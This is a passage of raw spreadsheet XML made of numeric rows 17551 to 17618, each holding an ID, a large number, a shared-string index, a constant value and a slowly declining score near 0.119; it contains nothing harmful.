        <v>15755</v>
      </c>
      <c r="F17551" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="17552" ht="15.75" customHeight="1">
      <c r="A17552" s="1">
        <v>10975.0</v>
      </c>
      <c r="B17552" s="2">
        <v>1.7336646E7</v>
      </c>
      <c r="C17552" s="2" t="s">
        <v>16921</v>
      </c>
      <c r="D17552" s="2">
        <v>1.0</v>
      </c>
      <c r="E17552" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17552" s="2">
        <v>0.1195856873822976</v>
      </c>
    </row>
    <row r="17553" ht="15.75" customHeight="1">
      <c r="A17553" s="1">
        <v>7090.0</v>
      </c>
      <c r="B17553" s="2">
        <v>5029279.0</v>
      </c>
      <c r="C17553" s="2" t="s">
        <v>16922</v>
      </c>
      <c r="D17553" s="2">
        <v>1.0</v>
      </c>
      <c r="E17553" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17553" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="17554" ht="15.75" customHeight="1">
      <c r="A17554" s="1">
        <v>18574.0</v>
      </c>
      <c r="B17554" s="2">
        <v>5.3242888E7</v>
      </c>
      <c r="C17554" s="2" t="s">
        <v>16923</v>
      </c>
      <c r="D17554" s="2">
        <v>1.0</v>
      </c>
      <c r="E17554" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17554" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="17555" ht="15.75" customHeight="1">
      <c r="A17555" s="1">
        <v>25786.0</v>
      </c>
      <c r="B17555" s="2">
        <v>1.4671598E7</v>
      </c>
      <c r="C17555" s="2" t="s">
        <v>16924</v>
      </c>
      <c r="D17555" s="2">
        <v>1.0</v>
      </c>
      <c r="E17555" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17555" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="17556" ht="15.75" customHeight="1">
      <c r="A17556" s="1">
        <v>26330.0</v>
      </c>
      <c r="B17556" s="2">
        <v>1.6720064E7</v>
      </c>
      <c r="C17556" s="2" t="s">
        <v>16925</v>
      </c>
      <c r="D17556" s="2">
        <v>1.0</v>
      </c>
      <c r="E17556" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17556" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="17557" ht="15.75" customHeight="1">
      <c r="A17557" s="1">
        <v>28482.0</v>
      </c>
      <c r="B17557" s="2">
        <v>2.6636948E7</v>
      </c>
      <c r="C17557" s="2" t="s">
        <v>16926</v>
      </c>
      <c r="D17557" s="2">
        <v>1.0</v>
      </c>
      <c r="E17557" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17557" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="17558" ht="15.75" customHeight="1">
      <c r="A17558" s="1">
        <v>915.0</v>
      </c>
      <c r="B17558" s="2">
        <v>2.2214931E7</v>
      </c>
      <c r="C17558" s="2" t="s">
        <v>16927</v>
      </c>
      <c r="D17558" s="2">
        <v>1.0</v>
      </c>
      <c r="E17558" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17558" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="17559" ht="15.75" customHeight="1">
      <c r="A17559" s="1">
        <v>6566.0</v>
      </c>
      <c r="B17559" s="2">
        <v>4.8902515E7</v>
      </c>
      <c r="C17559" s="2" t="s">
        <v>16928</v>
      </c>
      <c r="D17559" s="2">
        <v>1.0</v>
      </c>
      <c r="E17559" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17559" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="17560" ht="15.75" customHeight="1">
      <c r="A17560" s="1">
        <v>7012.0</v>
      </c>
      <c r="B17560" s="2">
        <v>5.0095074E7</v>
      </c>
      <c r="C17560" s="2" t="s">
        <v>16929</v>
      </c>
      <c r="D17560" s="2">
        <v>1.0</v>
      </c>
      <c r="E17560" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17560" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="17561" ht="15.75" customHeight="1">
      <c r="A17561" s="1">
        <v>12685.0</v>
      </c>
      <c r="B17561" s="2">
        <v>3.0685995E7</v>
      </c>
      <c r="C17561" s="2" t="s">
        <v>16930</v>
      </c>
      <c r="D17561" s="2">
        <v>1.0</v>
      </c>
      <c r="E17561" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17561" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="17562" ht="15.75" customHeight="1">
      <c r="A17562" s="1">
        <v>14948.0</v>
      </c>
      <c r="B17562" s="2">
        <v>4.1282504E7</v>
      </c>
      <c r="C17562" s="2" t="s">
        <v>16931</v>
      </c>
      <c r="D17562" s="2">
        <v>1.0</v>
      </c>
      <c r="E17562" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17562" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="17563" ht="15.75" customHeight="1">
      <c r="A17563" s="1">
        <v>20634.0</v>
      </c>
      <c r="B17563" s="2">
        <v>1.4164414E7</v>
      </c>
      <c r="C17563" s="2" t="s">
        <v>16932</v>
      </c>
      <c r="D17563" s="2">
        <v>1.0</v>
      </c>
      <c r="E17563" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17563" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="17564" ht="15.75" customHeight="1">
      <c r="A17564" s="1">
        <v>26956.0</v>
      </c>
      <c r="B17564" s="2">
        <v>1.961731E7</v>
      </c>
      <c r="C17564" s="2" t="s">
        <v>16933</v>
      </c>
      <c r="D17564" s="2">
        <v>1.0</v>
      </c>
      <c r="E17564" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17564" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="17565" ht="15.75" customHeight="1">
      <c r="A17565" s="1">
        <v>28513.0</v>
      </c>
      <c r="B17565" s="2">
        <v>2.6749857E7</v>
      </c>
      <c r="C17565" s="2" t="s">
        <v>16934</v>
      </c>
      <c r="D17565" s="2">
        <v>1.0</v>
      </c>
      <c r="E17565" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17565" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="17566" ht="15.75" customHeight="1">
      <c r="A17566" s="1">
        <v>29370.0</v>
      </c>
      <c r="B17566" s="2">
        <v>3.1683773E7</v>
      </c>
      <c r="C17566" s="2" t="s">
        <v>16935</v>
      </c>
      <c r="D17566" s="2">
        <v>1.0</v>
      </c>
      <c r="E17566" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17566" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="17567" ht="15.75" customHeight="1">
      <c r="A17567" s="1">
        <v>32150.0</v>
      </c>
      <c r="B17567" s="2">
        <v>5427895.0</v>
      </c>
      <c r="C17567" s="2" t="s">
        <v>16936</v>
      </c>
      <c r="D17567" s="2">
        <v>1.0</v>
      </c>
      <c r="E17567" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17567" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="17568" ht="15.75" customHeight="1">
      <c r="A17568" s="1">
        <v>1477.0</v>
      </c>
      <c r="B17568" s="2">
        <v>2.7119591E7</v>
      </c>
      <c r="C17568" s="2" t="s">
        <v>16937</v>
      </c>
      <c r="D17568" s="2">
        <v>1.0</v>
      </c>
      <c r="E17568" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17568" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="17569" ht="15.75" customHeight="1">
      <c r="A17569" s="1">
        <v>7295.0</v>
      </c>
      <c r="B17569" s="2">
        <v>5.08266E7</v>
      </c>
      <c r="C17569" s="2" t="s">
        <v>16938</v>
      </c>
      <c r="D17569" s="2">
        <v>1.0</v>
      </c>
      <c r="E17569" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17569" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="17570" ht="15.75" customHeight="1">
      <c r="A17570" s="1">
        <v>9269.0</v>
      </c>
      <c r="B17570" s="2">
        <v>5.549947E7</v>
      </c>
      <c r="C17570" s="2" t="s">
        <v>16939</v>
      </c>
      <c r="D17570" s="2">
        <v>1.0</v>
      </c>
      <c r="E17570" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17570" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="17571" ht="15.75" customHeight="1">
      <c r="A17571" s="1">
        <v>10424.0</v>
      </c>
      <c r="B17571" s="2">
        <v>1.0331374E7</v>
      </c>
      <c r="C17571" s="2" t="s">
        <v>16940</v>
      </c>
      <c r="D17571" s="2">
        <v>1.0</v>
      </c>
      <c r="E17571" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17571" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="17572" ht="15.75" customHeight="1">
      <c r="A17572" s="1">
        <v>11651.0</v>
      </c>
      <c r="B17572" s="2">
        <v>2.3271798E7</v>
      </c>
      <c r="C17572" s="2" t="s">
        <v>16941</v>
      </c>
      <c r="D17572" s="2">
        <v>1.0</v>
      </c>
      <c r="E17572" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17572" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="17573" ht="15.75" customHeight="1">
      <c r="A17573" s="1">
        <v>14044.0</v>
      </c>
      <c r="B17573" s="2">
        <v>3.7504815E7</v>
      </c>
      <c r="C17573" s="2" t="s">
        <v>16942</v>
      </c>
      <c r="D17573" s="2">
        <v>1.0</v>
      </c>
      <c r="E17573" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17573" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="17574" ht="15.75" customHeight="1">
      <c r="A17574" s="1">
        <v>15221.0</v>
      </c>
      <c r="B17574" s="2">
        <v>4.2163472E7</v>
      </c>
      <c r="C17574" s="2" t="s">
        <v>16943</v>
      </c>
      <c r="D17574" s="2">
        <v>1.0</v>
      </c>
      <c r="E17574" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17574" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="17575" ht="15.75" customHeight="1">
      <c r="A17575" s="1">
        <v>20934.0</v>
      </c>
      <c r="B17575" s="2">
        <v>1.643714E7</v>
      </c>
      <c r="C17575" s="2" t="s">
        <v>16944</v>
      </c>
      <c r="D17575" s="2">
        <v>1.0</v>
      </c>
      <c r="E17575" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17575" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="17576" ht="15.75" customHeight="1">
      <c r="A17576" s="1">
        <v>26844.0</v>
      </c>
      <c r="B17576" s="2">
        <v>1.9009347E7</v>
      </c>
      <c r="C17576" s="2" t="s">
        <v>16945</v>
      </c>
      <c r="D17576" s="2">
        <v>1.0</v>
      </c>
      <c r="E17576" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17576" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="17577" ht="15.75" customHeight="1">
      <c r="A17577" s="1">
        <v>28373.0</v>
      </c>
      <c r="B17577" s="2">
        <v>2.6047055E7</v>
      </c>
      <c r="C17577" s="2" t="s">
        <v>16946</v>
      </c>
      <c r="D17577" s="2">
        <v>1.0</v>
      </c>
      <c r="E17577" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17577" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="17578" ht="15.75" customHeight="1">
      <c r="A17578" s="1">
        <v>32641.0</v>
      </c>
      <c r="B17578" s="2">
        <v>5857973.0</v>
      </c>
      <c r="C17578" s="2" t="s">
        <v>1046</v>
      </c>
      <c r="D17578" s="2">
        <v>1.0</v>
      </c>
      <c r="E17578" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17578" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="17579" ht="15.75" customHeight="1">
      <c r="A17579" s="1">
        <v>3014.0</v>
      </c>
      <c r="B17579" s="2">
        <v>3.6381932E7</v>
      </c>
      <c r="C17579" s="2" t="s">
        <v>16947</v>
      </c>
      <c r="D17579" s="2">
        <v>1.0</v>
      </c>
      <c r="E17579" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17579" s="2">
        <v>0.1193078324225865</v>
      </c>
    </row>
    <row r="17580" ht="15.75" customHeight="1">
      <c r="A17580" s="1">
        <v>29201.0</v>
      </c>
      <c r="B17580" s="2">
        <v>3.0766178E7</v>
      </c>
      <c r="C17580" s="2" t="s">
        <v>16948</v>
      </c>
      <c r="D17580" s="2">
        <v>1.0</v>
      </c>
      <c r="E17580" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17580" s="2">
        <v>0.1193078324225865</v>
      </c>
    </row>
    <row r="17581" ht="15.75" customHeight="1">
      <c r="A17581" s="1">
        <v>32349.0</v>
      </c>
      <c r="B17581" s="2">
        <v>5591903.0</v>
      </c>
      <c r="C17581" s="2" t="s">
        <v>16949</v>
      </c>
      <c r="D17581" s="2">
        <v>1.0</v>
      </c>
      <c r="E17581" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17581" s="2">
        <v>0.1193078324225865</v>
      </c>
    </row>
    <row r="17582" ht="15.75" customHeight="1">
      <c r="A17582" s="1">
        <v>7342.0</v>
      </c>
      <c r="B17582" s="2">
        <v>5.0966078E7</v>
      </c>
      <c r="C17582" s="2" t="s">
        <v>16950</v>
      </c>
      <c r="D17582" s="2">
        <v>1.0</v>
      </c>
      <c r="E17582" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17582" s="2">
        <v>0.1190476190476191</v>
      </c>
    </row>
    <row r="17583" ht="15.75" customHeight="1">
      <c r="A17583" s="1">
        <v>19706.0</v>
      </c>
      <c r="B17583" s="2">
        <v>5.6535255E7</v>
      </c>
      <c r="C17583" s="2" t="s">
        <v>16951</v>
      </c>
      <c r="D17583" s="2">
        <v>1.0</v>
      </c>
      <c r="E17583" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17583" s="2">
        <v>0.1190476190476191</v>
      </c>
    </row>
    <row r="17584" ht="15.75" customHeight="1">
      <c r="A17584" s="1">
        <v>12453.0</v>
      </c>
      <c r="B17584" s="2">
        <v>2.9338469E7</v>
      </c>
      <c r="C17584" s="2" t="s">
        <v>16952</v>
      </c>
      <c r="D17584" s="2">
        <v>1.0</v>
      </c>
      <c r="E17584" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17584" s="2">
        <v>0.1189236111111111</v>
      </c>
    </row>
    <row r="17585" ht="15.75" customHeight="1">
      <c r="A17585" s="1">
        <v>332.0</v>
      </c>
      <c r="B17585" s="2">
        <v>1.581964E7</v>
      </c>
      <c r="C17585" s="2" t="s">
        <v>16953</v>
      </c>
      <c r="D17585" s="2">
        <v>1.0</v>
      </c>
      <c r="E17585" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17585" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="17586" ht="15.75" customHeight="1">
      <c r="A17586" s="1">
        <v>639.0</v>
      </c>
      <c r="B17586" s="2">
        <v>1.9756382E7</v>
      </c>
      <c r="C17586" s="2" t="s">
        <v>16954</v>
      </c>
      <c r="D17586" s="2">
        <v>1.0</v>
      </c>
      <c r="E17586" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17586" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="17587" ht="15.75" customHeight="1">
      <c r="A17587" s="1">
        <v>1331.0</v>
      </c>
      <c r="B17587" s="2">
        <v>2.5831884E7</v>
      </c>
      <c r="C17587" s="2" t="s">
        <v>16955</v>
      </c>
      <c r="D17587" s="2">
        <v>1.0</v>
      </c>
      <c r="E17587" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17587" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="17588" ht="15.75" customHeight="1">
      <c r="A17588" s="1">
        <v>2105.0</v>
      </c>
      <c r="B17588" s="2">
        <v>3.1306425E7</v>
      </c>
      <c r="C17588" s="2" t="s">
        <v>16956</v>
      </c>
      <c r="D17588" s="2">
        <v>1.0</v>
      </c>
      <c r="E17588" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17588" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="17589" ht="15.75" customHeight="1">
      <c r="A17589" s="1">
        <v>4622.0</v>
      </c>
      <c r="B17589" s="2">
        <v>4.297643E7</v>
      </c>
      <c r="C17589" s="2" t="s">
        <v>16957</v>
      </c>
      <c r="D17589" s="2">
        <v>1.0</v>
      </c>
      <c r="E17589" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17589" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="17590" ht="15.75" customHeight="1">
      <c r="A17590" s="1">
        <v>5161.0</v>
      </c>
      <c r="B17590" s="2">
        <v>4.4746082E7</v>
      </c>
      <c r="C17590" s="2" t="s">
        <v>16958</v>
      </c>
      <c r="D17590" s="2">
        <v>1.0</v>
      </c>
      <c r="E17590" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17590" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="17591" ht="15.75" customHeight="1">
      <c r="A17591" s="1">
        <v>5418.0</v>
      </c>
      <c r="B17591" s="2">
        <v>4.5544618E7</v>
      </c>
      <c r="C17591" s="2" t="s">
        <v>16959</v>
      </c>
      <c r="D17591" s="2">
        <v>1.0</v>
      </c>
      <c r="E17591" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17591" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="17592" ht="15.75" customHeight="1">
      <c r="A17592" s="1">
        <v>5567.0</v>
      </c>
      <c r="B17592" s="2">
        <v>4.6016576E7</v>
      </c>
      <c r="C17592" s="2" t="s">
        <v>16960</v>
      </c>
      <c r="D17592" s="2">
        <v>1.0</v>
      </c>
      <c r="E17592" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17592" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="17593" ht="15.75" customHeight="1">
      <c r="A17593" s="1">
        <v>5629.0</v>
      </c>
      <c r="B17593" s="2">
        <v>4.6209195E7</v>
      </c>
      <c r="C17593" s="2" t="s">
        <v>16961</v>
      </c>
      <c r="D17593" s="2">
        <v>1.0</v>
      </c>
      <c r="E17593" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17593" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="17594" ht="15.75" customHeight="1">
      <c r="A17594" s="1">
        <v>6113.0</v>
      </c>
      <c r="B17594" s="2">
        <v>4.7769597E7</v>
      </c>
      <c r="C17594" s="2" t="s">
        <v>16962</v>
      </c>
      <c r="D17594" s="2">
        <v>1.0</v>
      </c>
      <c r="E17594" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17594" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="17595" ht="15.75" customHeight="1">
      <c r="A17595" s="1">
        <v>10375.0</v>
      </c>
      <c r="B17595" s="2">
        <v>7947871.0</v>
      </c>
      <c r="C17595" s="2" t="s">
        <v>16963</v>
      </c>
      <c r="D17595" s="2">
        <v>1.0</v>
      </c>
      <c r="E17595" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17595" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="17596" ht="15.75" customHeight="1">
      <c r="A17596" s="1">
        <v>10537.0</v>
      </c>
      <c r="B17596" s="2">
        <v>1.2404073E7</v>
      </c>
      <c r="C17596" s="2" t="s">
        <v>16964</v>
      </c>
      <c r="D17596" s="2">
        <v>1.0</v>
      </c>
      <c r="E17596" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17596" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="17597" ht="15.75" customHeight="1">
      <c r="A17597" s="1">
        <v>10806.0</v>
      </c>
      <c r="B17597" s="2">
        <v>1.5836575E7</v>
      </c>
      <c r="C17597" s="2" t="s">
        <v>16965</v>
      </c>
      <c r="D17597" s="2">
        <v>1.0</v>
      </c>
      <c r="E17597" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17597" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="17598" ht="15.75" customHeight="1">
      <c r="A17598" s="1">
        <v>11092.0</v>
      </c>
      <c r="B17598" s="2">
        <v>1.8519628E7</v>
      </c>
      <c r="C17598" s="2" t="s">
        <v>16966</v>
      </c>
      <c r="D17598" s="2">
        <v>1.0</v>
      </c>
      <c r="E17598" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17598" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="17599" ht="15.75" customHeight="1">
      <c r="A17599" s="1">
        <v>12512.0</v>
      </c>
      <c r="B17599" s="2">
        <v>2.9649192E7</v>
      </c>
      <c r="C17599" s="2" t="s">
        <v>16967</v>
      </c>
      <c r="D17599" s="2">
        <v>1.0</v>
      </c>
      <c r="E17599" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17599" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="17600" ht="15.75" customHeight="1">
      <c r="A17600" s="1">
        <v>12816.0</v>
      </c>
      <c r="B17600" s="2">
        <v>3.1607367E7</v>
      </c>
      <c r="C17600" s="2" t="s">
        <v>16968</v>
      </c>
      <c r="D17600" s="2">
        <v>1.0</v>
      </c>
      <c r="E17600" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17600" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="17601" ht="15.75" customHeight="1">
      <c r="A17601" s="1">
        <v>14768.0</v>
      </c>
      <c r="B17601" s="2">
        <v>4.0845537E7</v>
      </c>
      <c r="C17601" s="2" t="s">
        <v>16969</v>
      </c>
      <c r="D17601" s="2">
        <v>1.0</v>
      </c>
      <c r="E17601" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17601" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="17602" ht="15.75" customHeight="1">
      <c r="A17602" s="1">
        <v>15786.0</v>
      </c>
      <c r="B17602" s="2">
        <v>4.4199813E7</v>
      </c>
      <c r="C17602" s="2" t="s">
        <v>16970</v>
      </c>
      <c r="D17602" s="2">
        <v>1.0</v>
      </c>
      <c r="E17602" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17602" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="17603" ht="15.75" customHeight="1">
      <c r="A17603" s="1">
        <v>16163.0</v>
      </c>
      <c r="B17603" s="2">
        <v>4.5616085E7</v>
      </c>
      <c r="C17603" s="2" t="s">
        <v>16971</v>
      </c>
      <c r="D17603" s="2">
        <v>1.0</v>
      </c>
      <c r="E17603" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17603" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="17604" ht="15.75" customHeight="1">
      <c r="A17604" s="1">
        <v>16778.0</v>
      </c>
      <c r="B17604" s="2">
        <v>4.7724209E7</v>
      </c>
      <c r="C17604" s="2" t="s">
        <v>16972</v>
      </c>
      <c r="D17604" s="2">
        <v>1.0</v>
      </c>
      <c r="E17604" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17604" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="17605" ht="15.75" customHeight="1">
      <c r="A17605" s="1">
        <v>16917.0</v>
      </c>
      <c r="B17605" s="2">
        <v>4.8136066E7</v>
      </c>
      <c r="C17605" s="2" t="s">
        <v>16973</v>
      </c>
      <c r="D17605" s="2">
        <v>1.0</v>
      </c>
      <c r="E17605" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17605" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="17606" ht="15.75" customHeight="1">
      <c r="A17606" s="1">
        <v>17399.0</v>
      </c>
      <c r="B17606" s="2">
        <v>4.9629698E7</v>
      </c>
      <c r="C17606" s="2" t="s">
        <v>16974</v>
      </c>
      <c r="D17606" s="2">
        <v>1.0</v>
      </c>
      <c r="E17606" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17606" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="17607" ht="15.75" customHeight="1">
      <c r="A17607" s="1">
        <v>18556.0</v>
      </c>
      <c r="B17607" s="2">
        <v>5.3168335E7</v>
      </c>
      <c r="C17607" s="2" t="s">
        <v>16975</v>
      </c>
      <c r="D17607" s="2">
        <v>1.0</v>
      </c>
      <c r="E17607" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17607" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="17608" ht="15.75" customHeight="1">
      <c r="A17608" s="1">
        <v>19470.0</v>
      </c>
      <c r="B17608" s="2">
        <v>5.5819724E7</v>
      </c>
      <c r="C17608" s="2" t="s">
        <v>16976</v>
      </c>
      <c r="D17608" s="2">
        <v>1.0</v>
      </c>
      <c r="E17608" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17608" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="17609" ht="15.75" customHeight="1">
      <c r="A17609" s="1">
        <v>19825.0</v>
      </c>
      <c r="B17609" s="2">
        <v>5.7021814E7</v>
      </c>
      <c r="C17609" s="2" t="s">
        <v>16977</v>
      </c>
      <c r="D17609" s="2">
        <v>1.0</v>
      </c>
      <c r="E17609" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17609" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="17610" ht="15.75" customHeight="1">
      <c r="A17610" s="1">
        <v>20148.0</v>
      </c>
      <c r="B17610" s="2">
        <v>1.0202059E7</v>
      </c>
      <c r="C17610" s="2" t="s">
        <v>16978</v>
      </c>
      <c r="D17610" s="2">
        <v>1.0</v>
      </c>
      <c r="E17610" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17610" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="17611" ht="15.75" customHeight="1">
      <c r="A17611" s="1">
        <v>20248.0</v>
      </c>
      <c r="B17611" s="2">
        <v>1.0942192E7</v>
      </c>
      <c r="C17611" s="2" t="s">
        <v>16979</v>
      </c>
      <c r="D17611" s="2">
        <v>1.0</v>
      </c>
      <c r="E17611" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17611" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="17612" ht="15.75" customHeight="1">
      <c r="A17612" s="1">
        <v>20315.0</v>
      </c>
      <c r="B17612" s="2">
        <v>1.1421928E7</v>
      </c>
      <c r="C17612" s="2" t="s">
        <v>16980</v>
      </c>
      <c r="D17612" s="2">
        <v>1.0</v>
      </c>
      <c r="E17612" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17612" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="17613" ht="15.75" customHeight="1">
      <c r="A17613" s="1">
        <v>22461.0</v>
      </c>
      <c r="B17613" s="2">
        <v>3.6519821E7</v>
      </c>
      <c r="C17613" s="2" t="s">
        <v>16981</v>
      </c>
      <c r="D17613" s="2">
        <v>1.0</v>
      </c>
      <c r="E17613" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17613" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="17614" ht="15.75" customHeight="1">
      <c r="A17614" s="1">
        <v>22807.0</v>
      </c>
      <c r="B17614" s="2">
        <v>4.5912966E7</v>
      </c>
      <c r="C17614" s="2" t="s">
        <v>16982</v>
      </c>
      <c r="D17614" s="2">
        <v>1.0</v>
      </c>
      <c r="E17614" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17614" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="17615" ht="15.75" customHeight="1">
      <c r="A17615" s="1">
        <v>23577.0</v>
      </c>
      <c r="B17615" s="2">
        <v>6252744.0</v>
      </c>
      <c r="C17615" s="2" t="s">
        <v>16983</v>
      </c>
      <c r="D17615" s="2">
        <v>1.0</v>
      </c>
      <c r="E17615" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17615" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="17616" ht="15.75" customHeight="1">
      <c r="A17616" s="1">
        <v>24602.0</v>
      </c>
      <c r="B17616" s="2">
        <v>1.1421927E7</v>
      </c>
      <c r="C17616" s="2" t="s">
        <v>16980</v>
      </c>
      <c r="D17616" s="2">
        <v>1.0</v>
      </c>
      <c r="E17616" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17616" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="17617" ht="15.75" customHeight="1">
      <c r="A17617" s="1">
        <v>26541.0</v>
      </c>
      <c r="B17617" s="2">
        <v>1.7710399E7</v>
      </c>
      <c r="C17617" s="2" t="s">
        <v>16984</v>
      </c>
      <c r="D17617" s="2">
        <v>1.0</v>
      </c>
      <c r="E17617" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17617" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="17618" ht="15.75" customHeight="1">
      <c r="A17618" s="1">
        <v>27296.0</v>
      </c>
      <c r="B17618" s="2">
        <v>2.1306947E7</v>
      </c>
      <c r="C17618" s="2" t="s">
        <v>16985</v>
      </c>
      <c r="D17618" s="2">
        <v>1.0</v>
      </c>
      <c r="E17618" s="3" t="s">
        <v>15755</v>
